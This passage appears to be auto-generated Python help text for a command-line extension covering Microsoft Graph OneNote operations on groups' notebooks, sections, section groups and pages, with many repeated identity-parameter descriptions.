the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property sections for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes update-section'] = """ type: command short-summary: "Update the navigation property sections in groups" """ helps['notes update-section-group'] = """ type: command short-summary: "Update the navigation property sectionGroups in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for groups" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in groups" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-page'] = """ type: command short-summary: "Create new navigation property to pages for groups" """ helps['notes get-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes list-page'] = """ type: command short-summary: "Get pages from groups" """ helps['notes update-page'] = """ type: command short-summary: "Update the navigation property pages in groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section-group'] = """ type: command short-summary: "Update the navigation property parentSectionGroup in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSection for groups" """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section'] = """ type: command short-summary: "Get parentSection from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --links-one-note-client-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-client-url href=XX href: The url of the link. - name: --links-one-note-web-url short-summary: "externalLink" long-summary: | Usage: --links-one-note-web-url href=XX href: The url of the link. """ helps['notes update-parent-section'] = """ type: command short-summary: "Update the navigation property parentSection in groups" """ helps['notes'] = """ type: group short-summary: notes """ helps['notes delete'] = """ type: command short-summary: "Delete navigation property parentSectionGroup for groups" """ helps['notes create-section'] = """ type: command short-summary: "Create new navigation property to sections for groups" """ helps['notes create-section-group'] = """ type: command short-summary: "Create new navigation property to sectionGroups for groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user short-summary: "identity" long-summary: | Usage: --created-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. """ helps['notes get-parent-notebook'] = """ type: command short-summary: "Get parentNotebook from groups" """ helps['notes get-parent-section-group'] = """ type: command short-summary: "Get parentSectionGroup from groups" """ helps['notes get-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes get-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes list-section'] = """ type: command short-summary: "Get sections from groups" """ helps['notes list-section-group'] = """ type: command short-summary: "Get sectionGroups from groups" """ helps['notes update-parent-notebook'] = """ type: command short-summary: "Update the navigation property parentNotebook in groups" parameters: - name: --last-modified-by-application short-summary: "identity" long-summary: | Usage: --last-modified-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-device short-summary: "identity" long-summary: | Usage: --last-modified-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --last-modified-by-user short-summary: "identity" long-summary: | Usage: --last-modified-by-user display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-application short-summary: "identity" long-summary: | Usage: --created-by-application display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-device short-summary: "identity" long-summary: | Usage: --created-by-device display-name=XX id=XX display-name: The identity's display name. Note that this may not always be available or up to date. For \ example, if a user changes their display name, the API may show the new value in a future response, but the items \ associated with the user won't show up as having changed when using delta. id: Unique identifier for the identity. - name: --created-by-user 